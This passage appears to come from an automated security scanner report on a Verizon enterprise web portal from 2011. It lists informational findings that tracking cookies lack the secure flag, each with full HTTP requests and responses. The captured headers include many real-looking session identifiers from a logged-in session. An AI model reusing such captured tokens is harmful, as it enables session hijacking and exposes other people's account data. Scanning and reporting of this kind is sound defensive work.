Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 117
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "75-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

GIF89a
.
....................................................!.......,....
.
..."0.9.....3.......!G...
. ...........;

6.18. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/box_gradient.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 105
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "69-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7144
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

GIF89a..)....................................................!.......,......).....H.j.x.-.H`!".b.hp.....;

6.19. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:24 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/btn_Forms.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 607
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "25f-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:25:25 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:24 GMT

GIF89a..................................................

...................88.99.==.BB.CC.II.JJ.NN.OO.RR.SS.\\.]].]].bb.bb.bb.aa.gg.gg.kk.WW.kk.XX.[[.YY.^^.]].__.dd.cc.bb.ee.hh.ff.jj.ii.kk.yy.xx.}}.
...[SNIP]...

6.20. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/btn_close.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 248
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "f8-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7188
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

GIF89a.......................................................zzz......[[[...###............@@@...............!.......,..........u.&n@i..XFM.F.J.t]S().|/..L".....D..hJ..E% i*J.,....0ZD.@&..er..>@.oH.Pb
...[SNIP]...

6.21. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 334
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14e-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7156
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

GIF89a
....,..\\....II.UU................bb..........OO.kk.WW.gg....88.kk....jj.gg.==.dd....kk.bb.YY.\\.ii.__.ZZ.hh.ee.ff.^^.XX....gg.[[.cc.``.]].......................................................
...[SNIP]...

6.22. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_default_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 810
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "32a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

GIF89a,.......\\....II.UU................bb..........OO.kk.WW.gg....88.kk....jj.gg.==.dd....kk.bb.YY.\\.ii.__.ZZ.hh.ee.ff.^^.XX....gg.[[.cc.``.]].......................................................
...[SNIP]...

6.23. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 330
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7161
Date: Mon, 05 Sep 2011 22:22:45 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:45 GMT

GIF89a
....(.......000$$$yyy]]]

eee...<<<......ppp...***666.........YYYQQQ......vvv.........zzzdddrrr^^^```...nnn[[[ggg...~~~RRRkkk...................................................................
...[SNIP]...

6.24. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/button_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 805
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "325-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

GIF89a,............000$$$yyy]]]

eee...<<<......ppp...***666.........YYYQQQ......vvv.........zzzdddrrr^^^```...nnn[[[ggg...~~~RRRkkk...................................................................
...[SNIP]...

6.25. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/dropdownMenu.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 219
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "db-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:43 GMT

GIF89a...............................---.........222...UTT...///BBB...999....................................!.......,..........X.u.di....l...8.t].B..;....c..D~.Rc). ...d. %.....x`.$.XA.<-...dh.+.G..&
...[SNIP]...

6.26. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
